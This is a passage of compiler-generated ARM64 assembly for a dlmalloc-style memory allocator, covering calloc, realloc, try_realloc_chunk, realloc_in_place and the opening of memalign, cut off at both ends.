str x8, [sp, #8] ; 8-byte Folded Spill
b LBB6_95
LBB6_95:
ldr x8, [sp, #8] ; 8-byte Folded Reload
ldur x9, [x29, #-24]
str x8, [x9, #56]
ldur x0, [x29, #-32]
ldp x29, x30, [sp, #304] ; 16-byte Folded Reload
ldp x28, x27, [sp, #288] ; 16-byte Folded Reload
add sp, sp, #320
ret
.cfi_endproc
; -- End function
.globl _calloc ; -- Begin function calloc
.p2align 2
_calloc: ; @calloc
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
str x1, [sp, #16]
str xzr, [sp]
ldur x8, [x29, #-8]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB7_5
b LBB7_1
LBB7_1:
ldur x8, [x29, #-8]
ldr x9, [sp, #16]
mul x8, x8, x9
str x8, [sp]
ldur x8, [x29, #-8]
ldr x9, [sp, #16]
orr x8, x8, x9
ands x8, x8, #0xffffffffffff0000
cset w8, eq
tbnz w8, #0, LBB7_4
b LBB7_2
LBB7_2:
ldr x8, [sp]
ldur x9, [x29, #-8]
udiv x8, x8, x9
ldr x9, [sp, #16]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB7_4
b LBB7_3
LBB7_3:
mov x8, #-1
str x8, [sp]
b LBB7_4
LBB7_4:
b LBB7_5
LBB7_5:
ldr x0, [sp]
bl _malloc
str x0, [sp, #8]
ldr x8, [sp, #8]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB7_8
b LBB7_6
LBB7_6:
ldr x8, [sp, #8]
ldur x8, [x8, #-8]
ands x8, x8, #0x3
cset w8, eq
tbnz w8, #0, LBB7_8
b LBB7_7
LBB7_7:
ldr x0, [sp, #8]
ldr x2, [sp]
mov w1, #0
mov x3, #-1
bl ___memset_chk
b LBB7_8
LBB7_8:
ldr x0, [sp, #8]
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _realloc ; -- Begin function realloc
.p2align 2
_realloc: ; @realloc
.cfi_startproc
; %bb.0:
sub sp, sp, #112
.cfi_def_cfa_offset 112
stp x29, x30, [sp, #96] ; 16-byte Folded Spill
add x29, sp, #96
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur x1, [x29, #-16]
; kill: def $x8 killed $xzr
stur xzr, [x29, #-24]
ldur x8, [x29, #-8]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB8_2
b LBB8_1
LBB8_1:
ldur x0, [x29, #-16]
bl _malloc
stur x0, [x29, #-24]
b LBB8_17
LBB8_2:
ldur x8, [x29, #-16]
adds x8, x8, #128
cset w8, lo
tbnz w8, #0, LBB8_4
b LBB8_3
LBB8_3:
bl ___error
mov w8, #12
str w8, [x0]
b LBB8_16
LBB8_4:
ldur x8, [x29, #-16]
subs x8, x8, #23
cset w8, hs
tbnz w8, #0, LBB8_6
b LBB8_5
LBB8_5:
mov x8, #32
str x8, [sp, #24] ; 8-byte Folded Spill
b LBB8_7
LBB8_6:
ldur x8, [x29, #-16]
add x8, x8, #8
add x8, x8, #15
and x8, x8, #0xfffffffffffffff0
str x8, [sp, #24] ; 8-byte Folded Spill
b LBB8_7
LBB8_7:
ldr x8, [sp, #24] ; 8-byte Folded Reload
stur x8, [x29, #-32]
ldur x8, [x29, #-8]
subs x8, x8, #16
stur x8, [x29, #-40]
adrp x8, __gm_@PAGE
add x8, x8, __gm_@PAGEOFF
str x8, [sp, #48]
ldr x0, [sp, #48]
ldur x1, [x29, #-40]
ldur x2, [x29, #-32]
mov w3, #1
bl _try_realloc_chunk
str x0, [sp, #40]
ldr x8, [sp, #40]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB8_9
b LBB8_8
LBB8_8:
ldr x8, [sp, #40]
add x8, x8, #16
stur x8, [x29, #-24]
b LBB8_15
LBB8_9:
ldur x0, [x29, #-16]
bl _malloc
stur x0, [x29, #-24]
ldur x8, [x29, #-24]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB8_14
b LBB8_10
LBB8_10:
ldur x8, [x29, #-40]
ldr x8, [x8, #8]
and x8, x8, #0xfffffffffffffff8
ldur x9, [x29, #-40]
ldr x9, [x9, #8]
ands x9, x9, #0x3
cset w9, eq
and w11, w9, #0x1
mov x9, #16
mov x10, #8
ands w11, w11, #0x1
csel x9, x9, x10, ne
subs x8, x8, x9
str x8, [sp, #32]
ldur x8, [x29, #-24]
str x8, [sp, #8] ; 8-byte Folded Spill
ldur x8, [x29, #-8]
str x8, [sp, #16] ; 8-byte Folded Spill
ldr x8, [sp, #32]
ldur x9, [x29, #-16]
subs x8, x8, x9
cset w8, hs
tbnz w8, #0, LBB8_12
b LBB8_11
LBB8_11:
ldr x8, [sp, #32]
str x8, [sp] ; 8-byte Folded Spill
b LBB8_13
LBB8_12:
ldur x8, [x29, #-16]
str x8, [sp] ; 8-byte Folded Spill
b LBB8_13
LBB8_13:
ldr x1, [sp, #16] ; 8-byte Folded Reload
ldr x0, [sp, #8] ; 8-byte Folded Reload
ldr x2, [sp] ; 8-byte Folded Reload
mov x3, #-1
bl ___memcpy_chk
ldur x0, [x29, #-8]
bl _free
b LBB8_14
LBB8_14:
b LBB8_15
LBB8_15:
b LBB8_16
LBB8_16:
b LBB8_17
LBB8_17:
ldur x0, [x29, #-24]
ldp x29, x30, [sp, #96] ; 16-byte Folded Reload
add sp, sp, #112
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function try_realloc_chunk
_try_realloc_chunk: ; @try_realloc_chunk
.cfi_startproc
; %bb.0:
sub sp, sp, #336
.cfi_def_cfa_offset 336
stp x28, x27, [sp, #304] ; 16-byte Folded Spill
stp x29, x30, [sp, #320] ; 16-byte Folded Spill
add x29, sp, #320
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
stur x0, [x29, #-24]
stur x1, [x29, #-32]
stur x2, [x29, #-40]
stur w3, [x29, #-44]
; kill: def $x8 killed $xzr
stur xzr, [x29, #-56]
ldur x8, [x29, #-32]
ldr x8, [x8, #8]
and x8, x8, #0xfffffffffffffff8
stur x8, [x29, #-64]
ldur x8, [x29, #-32]
ldur x9, [x29, #-64]
add x8, x8, x9
stur x8, [x29, #-72]
ldur x8, [x29, #-32]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, lo
mov w9, #0
str w9, [sp, #36] ; 4-byte Folded Spill
tbnz w8, #0, LBB9_4
b LBB9_1
LBB9_1:
ldur x8, [x29, #-32]
ldr x8, [x8, #8]
and x8, x8, #0x3
subs x8, x8, #1
cset w8, eq
mov w9, #0
str w9, [sp, #36] ; 4-byte Folded Spill
tbnz w8, #0, LBB9_4
b LBB9_2
LBB9_2:
ldur x8, [x29, #-32]
ldur x9, [x29, #-72]
subs x8, x8, x9
cset w8, hs
mov w9, #0
str w9, [sp, #36] ; 4-byte Folded Spill
tbnz w8, #0, LBB9_4
b LBB9_3
LBB9_3:
ldur x8, [x29, #-72]
ldr x8, [x8, #8]
ands x8, x8, #0x1
cset w8, ne
str w8, [sp, #36] ; 4-byte Folded Spill
b LBB9_4
LBB9_4:
ldr w8, [sp, #36] ; 4-byte Folded Reload
; kill: def $x8 killed $w8
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB9_102
b LBB9_5
LBB9_5:
ldur x8, [x29, #-32]
ldr x8, [x8, #8]
ands x8, x8, #0x3
cset w8, ne
tbnz w8, #0, LBB9_7
b LBB9_6
LBB9_6:
ldur x0, [x29, #-24]
ldur x1, [x29, #-32]
ldur x2, [x29, #-40]
ldur w3, [x29, #-44]
bl _mmap_resize
stur x0, [x29, #-56]
b LBB9_101
LBB9_7:
ldur x8, [x29, #-64]
ldur x9, [x29, #-40]
subs x8, x8, x9
cset w8, lo
tbnz w8, #0, LBB9_11
b LBB9_8
LBB9_8:
ldur x8, [x29, #-64]
ldur x9, [x29, #-40]
subs x8, x8, x9
stur x8, [x29, #-80]
ldur x8, [x29, #-80]
subs x8, x8, #32
cset w8, lo
tbnz w8, #0, LBB9_10
b LBB9_9
LBB9_9:
ldur x8, [x29, #-32]
ldur x9, [x29, #-40]
add x8, x8, x9
stur x8, [x29, #-88]
ldur x8, [x29, #-32]
ldr x8, [x8, #8]
and x8, x8, #0x1
ldur x9, [x29, #-40]
orr x8, x8, x9
orr x8, x8, #0x2
ldur x9, [x29, #-32]
str x8, [x9, #8]
ldur x8, [x29, #-32]
ldur x9, [x29, #-40]
add x9, x8, x9
ldr x8, [x9, #8]
orr x8, x8, #0x1
str x8, [x9, #8]
ldur x8, [x29, #-88]
ldr x8, [x8, #8]
and x8, x8, #0x1
ldur x9, [x29, #-80]
orr x8, x8, x9
orr x8, x8, #0x2
ldur x9, [x29, #-88]
str x8, [x9, #8]
ldur x8, [x29, #-88]
ldur x9, [x29, #-80]
add x9, x8, x9
ldr x8, [x9, #8]
orr x8, x8, #0x1
str x8, [x9, #8]
ldur x0, [x29, #-24]
ldur x1, [x29, #-88]
ldur x2, [x29, #-80]
bl _dispose_chunk
b LBB9_10
LBB9_10:
ldur x8, [x29, #-32]
stur x8, [x29, #-56]
b LBB9_100
LBB9_11:
ldur x8, [x29, #-72]
ldur x9, [x29, #-24]
ldr x9, [x9, #40]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB9_15
b LBB9_12
LBB9_12:
ldur x8, [x29, #-64]
ldur x9, [x29, #-24]
ldr x9, [x9, #16]
add x8, x8, x9
ldur x9, [x29, #-40]
subs x8, x8, x9
cset w8, ls
tbnz w8, #0, LBB9_14
b LBB9_13
LBB9_13:
ldur x8, [x29, #-64]
ldur x9, [x29, #-24]
ldr x9, [x9, #16]
add x8, x8, x9
stur x8, [x29, #-96]
ldur x8, [x29, #-96]
ldur x9, [x29, #-40]
subs x8, x8, x9
stur x8, [x29, #-104]
ldur x8, [x29, #-32]
ldur x9, [x29, #-40]
add x8, x8, x9
stur x8, [x29, #-112]
ldur x8, [x29, #-32]
ldr x8, [x8, #8]
and x8, x8, #0x1
ldur x9, [x29, #-40]
orr x8, x8, x9
orr x8, x8, #0x2
ldur x9, [x29, #-32]
str x8, [x9, #8]
ldur x8, [x29, #-32]
ldur x9, [x29, #-40]
add x9, x8, x9
ldr x8, [x9, #8]
orr x8, x8, #0x1
str x8, [x9, #8]
ldur x8, [x29, #-104]
orr x8, x8, #0x1
ldur x9, [x29, #-112]
str x8, [x9, #8]
ldur x8, [x29, #-112]
ldur x9, [x29, #-24]
str x8, [x9, #40]
ldur x8, [x29, #-104]
ldur x9, [x29, #-24]
str x8, [x9, #16]
ldur x8, [x29, #-32]
stur x8, [x29, #-56]
b LBB9_14
LBB9_14:
b LBB9_99
LBB9_15:
ldur x8, [x29, #-72]
ldur x9, [x29, #-24]
ldr x9, [x9, #32]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB9_22
b LBB9_16
LBB9_16:
ldur x8, [x29, #-24]
ldr x8, [x8, #8]
stur x8, [x29, #-120]
ldur x8, [x29, #-64]
ldur x9, [x29, #-120]
add x8, x8, x9
ldur x9, [x29, #-40]
subs x8, x8, x9
cset w8, lo
tbnz w8, #0, LBB9_21
b LBB9_17
LBB9_17:
ldur x8, [x29, #-64]
ldur x9, [x29, #-120]
add x8, x8, x9
ldur x9, [x29, #-40]
subs x8, x8, x9
stur x8, [x29, #-128]
ldur x8, [x29, #-128]
subs x8, x8, #32
cset w8, lo
tbnz w8, #0, LBB9_19
b LBB9_18
LBB9_18:
ldur x8, [x29, #-32]
ldur x9, [x29, #-40]
add x8, x8, x9
stur x8, [x29, #-136]
ldur x8, [x29, #-136]
ldur x9, [x29, #-128]
add x8, x8, x9
stur x8, [x29, #-144]
ldur x8, [x29, #-32]
ldr x8, [x8, #8]
and x8, x8, #0x1
ldur x9, [x29, #-40]
orr x8, x8, x9
orr x8, x8, #0x2
ldur x9, [x29, #-32]
str x8, [x9, #8]
ldur x8, [x29, #-32]
ldur x9, [x29, #-40]
add x9, x8, x9
ldr x8, [x9, #8]
orr x8, x8, #0x1
str x8, [x9, #8]
ldur x8, [x29, #-128]
orr x8, x8, #0x1
ldur x9, [x29, #-136]
str x8, [x9, #8]
ldur x8, [x29, #-128]
ldur x9, [x29, #-136]
ldur x10, [x29, #-128]
str x8, [x9, x10]
ldur x9, [x29, #-144]
ldr x8, [x9, #8]
and x8, x8, #0xfffffffffffffffe
str x8, [x9, #8]
ldur x8, [x29, #-128]
ldur x9, [x29, #-24]
str x8, [x9, #8]
ldur x8, [x29, #-136]
ldur x9, [x29, #-24]
str x8, [x9, #32]
b LBB9_20
LBB9_19:
ldur x8, [x29, #-64]
ldur x9, [x29, #-120]
add x8, x8, x9
stur x8, [x29, #-152]
ldur x8, [x29, #-32]
ldr x8, [x8, #8]
and x8, x8, #0x1
ldur x9, [x29, #-152]
orr x8, x8, x9
orr x8, x8, #0x2
ldur x9, [x29, #-32]
str x8, [x9, #8]
ldur x8, [x29, #-32]
ldur x9, [x29, #-152]
add x9, x8, x9
ldr x8, [x9, #8]
orr x8, x8, #0x1
str x8, [x9, #8]
ldur x8, [x29, #-24]
str xzr, [x8, #8]
ldur x8, [x29, #-24]
; kill: def $x9 killed $xzr
str xzr, [x8, #32]
b LBB9_20
LBB9_20:
ldur x8, [x29, #-32]
stur x8, [x29, #-56]
b LBB9_21
LBB9_21:
b LBB9_98
LBB9_22:
ldur x8, [x29, #-72]
ldr x8, [x8, #8]
ands x8, x8, #0x2
cset w8, ne
tbnz w8, #0, LBB9_97
b LBB9_23
LBB9_23:
ldur x8, [x29, #-72]
ldr x8, [x8, #8]
and x8, x8, #0xfffffffffffffff8
str x8, [sp, #160]
ldur x8, [x29, #-64]
ldr x9, [sp, #160]
add x8, x8, x9
ldur x9, [x29, #-40]
subs x8, x8, x9
cset w8, lo
tbnz w8, #0, LBB9_96
b LBB9_24
LBB9_24:
ldur x8, [x29, #-64]
ldr x9, [sp, #160]
add x8, x8, x9
ldur x9, [x29, #-40]
subs x8, x8, x9
str x8, [sp, #152]
ldr x8, [sp, #160]
lsr x8, x8, #3
subs x8, x8, #32
cset w8, hs
tbnz w8, #0, LBB9_43
b LBB9_25
LBB9_25:
ldur x8, [x29, #-72]
ldr x8, [x8, #16]
str x8, [sp, #144]
ldur x8, [x29, #-72]
ldr x8, [x8, #24]
str x8, [sp, #136]
ldr x8, [sp, #160]
lsr x8, x8, #3
; kill: def $w8 killed $w8 killed $x8
str w8, [sp, #132]
ldr x8, [sp, #144]
ldur x9, [x29, #-24]
add x9, x9, #72
ldr w10, [sp, #132]
lsl w10, w10, #1
add x9, x9, w10, uxtw #3
subs x8, x8, x9
cset w8, eq
mov w9, #1
str w9, [sp, #32] ; 4-byte Folded Spill
tbnz w8, #0, LBB9_29
b LBB9_26
LBB9_26:
ldr x8, [sp, #144]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, lo
mov w9, #0
str w9, [sp, #28] ; 4-byte Folded Spill
tbnz w8, #0, LBB9_28
b LBB9_27
LBB9_27:
ldr x8, [sp, #144]
ldr x8, [x8, #24]
ldur x9, [x29, #-72]
subs x8, x8, x9
cset w8, eq
str w8, [sp, #28] ; 4-byte Folded Spill
b LBB9_28
LBB9_28:
ldr w8, [sp, #28] ; 4-byte Folded Reload
str w8, [sp, #32] ; 4-byte Folded Spill
b LBB9_29
LBB9_29:
ldr w8, [sp, #32] ; 4-byte Folded Reload
; kill: def $x8 killed $w8
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB9_41
b LBB9_30
LBB9_30:
ldr x8, [sp, #136]
ldr x9, [sp, #144]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB9_32
b LBB9_31
LBB9_31:
ldr w9, [sp, #132]
mov w8, #1
lsl w10, w8, w9
ldur x9, [x29, #-24]
ldr w8, [x9]
bic w8, w8, w10
str w8, [x9]
b LBB9_40
LBB9_32:
ldr x8, [sp, #136]
ldur x9, [x29, #-24]
add x9, x9, #72
ldr w10, [sp, #132]
lsl w10, w10, #1
add x9, x9, w10, uxtw #3
subs x8, x8, x9
cset w8, eq
mov w9, #1
str w9, [sp, #24] ; 4-byte Folded Spill
tbnz w8, #0, LBB9_36
b LBB9_33
LBB9_33:
ldr x8, [sp, #136]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, lo
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB9_35
b LBB9_34
LBB9_34:
ldr x8, [sp, #136]
ldr x8, [x8, #16]
ldur x9, [x29, #-72]
subs x8, x8, x9
cset w8, eq
str w8, [sp, #20] ; 4-byte Folded Spill
b LBB9_35
LBB9_35:
ldr w8, [sp, #20] ; 4-byte Folded Reload
str w8, [sp, #24] ; 4-byte Folded Spill
b LBB9_36
LBB9_36:
ldr w8, [sp, #24] ; 4-byte Folded Reload
; kill: def $x8 killed $w8
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB9_38
b LBB9_37
LBB9_37:
ldr x8, [sp, #136]
ldr x9, [sp, #144]
str x8, [x9, #24]
ldr x8, [sp, #144]
ldr x9, [sp, #136]
str x8, [x9, #16]
b LBB9_39
LBB9_38:
bl _abort
LBB9_39:
b LBB9_40
LBB9_40:
b LBB9_42
LBB9_41:
bl _abort
LBB9_42:
b LBB9_92
LBB9_43:
ldur x8, [x29, #-72]
str x8, [sp, #120]
ldr x8, [sp, #120]
ldr x8, [x8, #48]
str x8, [sp, #112]
ldr x8, [sp, #120]
ldr x8, [x8, #24]
ldr x9, [sp, #120]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB9_51
b LBB9_44
LBB9_44:
ldr x8, [sp, #120]
ldr x8, [x8, #16]
str x8, [sp, #96]
ldr x8, [sp, #120]
ldr x8, [x8, #24]
str x8, [sp, #104]
ldr x8, [sp, #96]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, lo
mov w9, #0
str w9, [sp, #16] ; 4-byte Folded Spill
tbnz w8, #0, LBB9_47
b LBB9_45
LBB9_45:
ldr x8, [sp, #96]
ldr x8, [x8, #24]
ldr x9, [sp, #120]
subs x8, x8, x9
cset w8, ne
mov w9, #0
str w9, [sp, #16] ; 4-byte Folded Spill
tbnz w8, #0, LBB9_47
b LBB9_46
LBB9_46:
ldr x8, [sp, #104]
ldr x8, [x8, #16]
ldr x9, [sp, #120]
subs x8, x8, x9
cset w8, eq
str w8, [sp, #16] ; 4-byte Folded Spill
b LBB9_47
LBB9_47:
ldr w8, [sp, #16] ; 4-byte Folded Reload
; kill: def $x8 killed $w8
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB9_49
b LBB9_48
LBB9_48:
ldr x8, [sp, #104]
ldr x9, [sp, #96]
str x8, [x9, #24]
ldr x8, [sp, #96]
ldr x9, [sp, #104]
str x8, [x9, #16]
b LBB9_50
LBB9_49:
bl _abort
LBB9_50:
b LBB9_63
LBB9_51:
ldr x8, [sp, #120]
add x9, x8, #40
str x9, [sp, #88]
ldr x8, [x8, #40]
mov x9, x8
str x9, [sp, #104]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB9_53
b LBB9_52
LBB9_52:
ldr x8, [sp, #120]
add x9, x8, #32
str x9, [sp, #88]
ldr x8, [x8, #32]
mov x9, x8
str x9, [sp, #104]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB9_62
b LBB9_53
LBB9_53:
b LBB9_54
LBB9_54: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #104]
add x9, x8, #40
str x9, [sp, #80]
ldr x8, [x8, #40]
subs x8, x8, #0
cset w8, ne
mov w9, #1
str w9, [sp, #12] ; 4-byte Folded Spill
tbnz w8, #0, LBB9_56
b LBB9_55
LBB9_55: ; in Loop: Header=BB9_54 Depth=1
ldr x8, [sp, #104]
add x9, x8, #32
str x9, [sp, #80]
ldr x8, [x8, #32]
subs x8, x8, #0
cset w8, ne
str w8, [sp, #12] ; 4-byte Folded Spill
b LBB9_56
LBB9_56: ; in Loop: Header=BB9_54 Depth=1
ldr w8, [sp, #12] ; 4-byte Folded Reload
tbz w8, #0, LBB9_58
b LBB9_57
LBB9_57: ; in Loop: Header=BB9_54 Depth=1
ldr x8, [sp, #80]
mov x9, x8
str x9, [sp, #88]
ldr x8, [x8]
str x8, [sp, #104]
b LBB9_54
LBB9_58:
ldr x8, [sp, #88]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB9_60
b LBB9_59
LBB9_59:
ldr x8, [sp, #88]
; kill: def $x9 killed $xzr
str xzr, [x8]
b LBB9_61
LBB9_60:
bl _abort
LBB9_61:
b LBB9_62
LBB9_62:
b LBB9_63
LBB9_63:
ldr x8, [sp, #112]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB9_91
b LBB9_64
LBB9_64:
ldur x8, [x29, #-24]
add x8, x8, #600
ldr x9, [sp, #120]
ldr w9, [x9, #56]
; kill: def $x9 killed $w9
add x8, x8, x9, lsl #3
str x8, [sp, #72]
ldr x8, [sp, #120]
ldr x9, [sp, #72]
ldr x9, [x9]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB9_68
b LBB9_65
LBB9_65:
ldr x8, [sp, #104]
ldr x10, [sp, #72]
mov x9, x8
str x9, [x10]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB9_67
b LBB9_66
LBB9_66:
ldr x8, [sp, #120]
ldr w9, [x8, #56]
mov w8, #1
lsl w10, w8, w9
ldur x9, [x29, #-24]
ldr w8, [x9, #4]
bic w8, w8, w10
str w8, [x9, #4]
b LBB9_67
LBB9_67:
b LBB9_75
LBB9_68:
ldr x8, [sp, #112]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB9_73
b LBB9_69
LBB9_69:
ldr x8, [sp, #112]
ldr x8, [x8, #32]
ldr x9, [sp, #120]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB9_71
b LBB9_70
LBB9_70:
ldr x8, [sp, #104]
ldr x9, [sp, #112]
str x8, [x9, #32]
b LBB9_72
LBB9_71:
ldr x8, [sp, #104]
ldr x9, [sp, #112]
str x8, [x9, #40]
b LBB9_72
LBB9_72:
b LBB9_74
LBB9_73:
bl _abort
LBB9_74:
b LBB9_75
LBB9_75:
ldr x8, [sp, #104]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB9_90
b LBB9_76
LBB9_76:
ldr x8, [sp, #104]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB9_88
b LBB9_77
LBB9_77:
ldr x8, [sp, #112]
ldr x9, [sp, #104]
str x8, [x9, #48]
ldr x8, [sp, #120]
ldr x8, [x8, #32]
mov x9, x8
str x9, [sp, #64]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB9_82
b LBB9_78
LBB9_78:
ldr x8, [sp, #64]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB9_80
b LBB9_79
LBB9_79:
ldr x8, [sp, #64]
ldr x9, [sp, #104]
str x8, [x9, #32]
ldr x8, [sp, #104]
ldr x9, [sp, #64]
str x8, [x9, #48]
b LBB9_81
LBB9_80:
bl _abort
LBB9_81:
b LBB9_82
LBB9_82:
ldr x8, [sp, #120]
ldr x8, [x8, #40]
mov x9, x8
str x9, [sp, #56]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB9_87
b LBB9_83
LBB9_83:
ldr x8, [sp, #56]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB9_85
b LBB9_84
LBB9_84:
ldr x8, [sp, #56]
ldr x9, [sp, #104]
str x8, [x9, #40]
ldr x8, [sp, #104]
ldr x9, [sp, #56]
str x8, [x9, #48]
b LBB9_86
LBB9_85:
bl _abort
LBB9_86:
b LBB9_87
LBB9_87:
b LBB9_89
LBB9_88:
bl _abort
LBB9_89:
b LBB9_90
LBB9_90:
b LBB9_91
LBB9_91:
b LBB9_92
LBB9_92:
ldr x8, [sp, #152]
subs x8, x8, #32
cset w8, hs
tbnz w8, #0, LBB9_94
b LBB9_93
LBB9_93:
ldur x8, [x29, #-64]
ldr x9, [sp, #160]
add x8, x8, x9
str x8, [sp, #48]
ldur x8, [x29, #-32]
ldr x8, [x8, #8]
and x8, x8, #0x1
ldr x9, [sp, #48]
orr x8, x8, x9
orr x8, x8, #0x2
ldur x9, [x29, #-32]
str x8, [x9, #8]
ldur x8, [x29, #-32]
ldr x9, [sp, #48]
add x9, x8, x9
ldr x8, [x9, #8]
orr x8, x8, #0x1
str x8, [x9, #8]
b LBB9_95
LBB9_94:
ldur x8, [x29, #-32]
ldur x9, [x29, #-40]
add x8, x8, x9
str x8, [sp, #40]
ldur x8, [x29, #-32]
ldr x8, [x8, #8]
and x8, x8, #0x1
ldur x9, [x29, #-40]
orr x8, x8, x9
orr x8, x8, #0x2
ldur x9, [x29, #-32]
str x8, [x9, #8]
ldur x8, [x29, #-32]
ldur x9, [x29, #-40]
add x9, x8, x9
ldr x8, [x9, #8]
orr x8, x8, #0x1
str x8, [x9, #8]
ldr x8, [sp, #40]
ldr x8, [x8, #8]
and x8, x8, #0x1
ldr x9, [sp, #152]
orr x8, x8, x9
orr x8, x8, #0x2
ldr x9, [sp, #40]
str x8, [x9, #8]
ldr x8, [sp, #40]
ldr x9, [sp, #152]
add x9, x8, x9
ldr x8, [x9, #8]
orr x8, x8, #0x1
str x8, [x9, #8]
ldur x0, [x29, #-24]
ldr x1, [sp, #40]
ldr x2, [sp, #152]
bl _dispose_chunk
b LBB9_95
LBB9_95:
ldur x8, [x29, #-32]
stur x8, [x29, #-56]
b LBB9_96
LBB9_96:
b LBB9_97
LBB9_97:
b LBB9_98
LBB9_98:
b LBB9_99
LBB9_99:
b LBB9_100
LBB9_100:
b LBB9_101
LBB9_101:
b LBB9_103
LBB9_102:
bl _abort
LBB9_103:
ldur x0, [x29, #-56]
ldp x29, x30, [sp, #320] ; 16-byte Folded Reload
ldp x28, x27, [sp, #304] ; 16-byte Folded Reload
add sp, sp, #336
ret
.cfi_endproc
; -- End function
.globl _realloc_in_place ; -- Begin function realloc_in_place
.p2align 2
_realloc_in_place: ; @realloc_in_place
.cfi_startproc
; %bb.0:
sub sp, sp, #80
.cfi_def_cfa_offset 80
stp x29, x30, [sp, #64] ; 16-byte Folded Spill
add x29, sp, #64
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur x1, [x29, #-16]
; kill: def $x8 killed $xzr
stur xzr, [x29, #-24]
ldur x8, [x29, #-8]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB10_10
b LBB10_1
LBB10_1:
ldur x8, [x29, #-16]
adds x8, x8, #128
cset w8, lo
tbnz w8, #0, LBB10_3
b LBB10_2
LBB10_2:
bl ___error
mov w8, #12
str w8, [x0]
b LBB10_9
LBB10_3:
ldur x8, [x29, #-16]
subs x8, x8, #23
cset w8, hs
tbnz w8, #0, LBB10_5
b LBB10_4
LBB10_4:
mov x8, #32
str x8, [sp] ; 8-byte Folded Spill
b LBB10_6
LBB10_5:
ldur x8, [x29, #-16]
add x8, x8, #8
add x8, x8, #15
and x8, x8, #0xfffffffffffffff0
str x8, [sp] ; 8-byte Folded Spill
b LBB10_6
LBB10_6:
ldr x8, [sp] ; 8-byte Folded Reload
str x8, [sp, #32]
ldur x8, [x29, #-8]
subs x8, x8, #16
str x8, [sp, #24]
adrp x8, __gm_@PAGE
add x8, x8, __gm_@PAGEOFF
str x8, [sp, #16]
ldr x0, [sp, #16]
ldr x1, [sp, #24]
ldr x2, [sp, #32]
mov w3, #0
bl _try_realloc_chunk
str x0, [sp, #8]
ldr x8, [sp, #8]
ldr x9, [sp, #24]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB10_8
b LBB10_7
LBB10_7:
ldur x8, [x29, #-8]
stur x8, [x29, #-24]
b LBB10_8
LBB10_8:
b LBB10_9
LBB10_9:
b LBB10_10
LBB10_10:
ldur x0, [x29, #-24]
ldp x29, x30, [sp, #64] ; 16-byte Folded Reload
add sp, sp, #80
ret
.cfi_endproc
; -- End function
.globl _memalign ; -- Begin function memalign
.p2align 2
_memalign: ; @memalign
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
str x0, [sp, #16]
str x1, [sp, #8]
ldr x8, [sp, #16]
subs x8, x8, #16
cset w8, hi
tbnz w8, #0, LBB11_2
b LBB11_1
LBB11_1:
